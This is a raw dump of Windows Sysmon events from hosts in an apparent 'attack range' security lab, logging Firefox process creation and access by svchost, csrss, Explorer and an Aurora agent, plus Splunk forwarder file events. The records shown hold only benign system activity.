12:22:39.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.787{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.787{FE4C2B44-E48F-63C7-3006-00000000AF02}24285840C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+22349|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.790{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000042227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.787{FE4C2B44-E48F-63C7-3006-00000000AF02}24285840C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\firefox.exe+2096b|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-D9F5-63C7-1200-00000000AF02}7561128C:\Windows\System32\svchost.exe{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-D9F5-63C7-1200-00000000AF02}7561128C:\Windows\System32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.756{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005648C:\Windows\Explorer.EXE{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Windows\System32\windows.storage.dll+16bb3f|C:\Windows\System32\windows.storage.dll+16b7b5|C:\Windows\System32\windows.storage.dll+16b2a6|C:\Windows\System32\windows.storage.dll+16c718|C:\Windows\System32\windows.storage.dll+16b0ce|C:\Windows\System32\windows.storage.dll+16dc6d|C:\Windows\System32\windows.storage.dll+16e3ac|C:\Windows\System32\windows.storage.dll+16d710|C:\Windows\System32\windows.storage.dll+16fcea|C:\Windows\System32\windows.storage.dll+16faa6|C:\Windows\System32\SHELL32.dll+5c3dd|C:\Windows\System32\SHELL32.dll+5b256|C:\Windows\System32\SHELL32.dll+4d869|C:\Windows\System32\SHELL32.dll+8f0be|C:\Windows\System32\windows.storage.dll+fa4e|C:\Windows\System32\windows.storage.dll+fc51|C:\Windows\System32\windows.storage.dll+f88f|C:\Windows\System32\SHELL32.dll+4d8ef|C:\Windows\System32\SHELL32.dll+8f0be|C:\Windows\System32\SHLWAPI.dll+e1f7 154100x800000000000000042218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.752{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\explorer.exe"C:\Windows\Explorer.EXE" /NOUACCHECK 23542300x800000000000000042217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:39.396{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31E14498214C7248C579686BA267297E,SHA256=1A4F028BFC0F61972AE0C292A29F25CADD16F93EBF1DDA2AB14DD1140578C82C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016692Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:39.462{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F92F4D27EFDA7F821456BE4E8E89E604,SHA256=83DEFB2477AA71DC4C0248ED811E2DC6B044DE1BFA658F0BF9A2C52DAEFCD62C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016694Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:40.552{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6915A9622DA632CC6F6BB9C1C63B2E8,SHA256=0654166B2BE815796FE2BAB8E431953A34427E9EBFFA5FE9CBFA8D8F220A0581,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.963{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d41c2|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.963{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.879{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\parent.lockMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.816{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F88933B985D51B218FCFA3196AA2C50A,SHA256=F627C053E63E1DB530EF21BBA1A33DFD44328F86DF160C770E8047D41E03727A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.816{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30BAF10592A81A2C6BB397BCB0D37358,SHA256=9FB45195BC1A898AB3C82744F35A50C49908352131BEA0E14E2EB215FCD44DD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.268{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.268{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.268{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.267{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.267{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.267{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.251{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.251{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3006-00000000AF02}2428C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.251{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program 